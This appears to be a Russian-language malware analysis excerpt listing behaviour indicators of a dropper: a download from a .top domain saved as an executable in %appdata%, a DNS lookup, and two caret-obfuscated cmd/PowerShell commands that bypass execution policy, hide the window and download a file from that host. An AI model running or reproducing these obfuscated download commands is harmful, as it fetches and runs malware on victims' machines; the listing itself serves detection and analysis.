Техническая информация
- http://newyeargoka.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PowershELL.E^x^E^ ^-eXEC^U^TI^O^np^oLiC^Y^ BYp^Ass -^No^PrOFiLE^ ^-^w^IndOws^tyle^ h^iDdE^n (N^Ew-O^bJE^Ct S^y^SteM.N^ET^.WE^Bc^L^i^enT).^dOwn^LoaDF^i^le('http://newyeargoka....
- DNS ASK ne###argoka.top
- '<SYSTEM32>\cmd.exe' /c "PowershELL.E^x^E^ ^-eXEC^U^TI^O^np^oLiC^Y^ BYp^Ass -^No^PrOFiLE^ ^-^w^IndOws^tyle^ h^iDdE^n (N^Ew-O^bJE^Ct S^y^SteM.N^ET^.WE^Bc^L^i^enT).^dOwn^LoaDF^i^le('http://newyeargoka....' (со скрытым окном)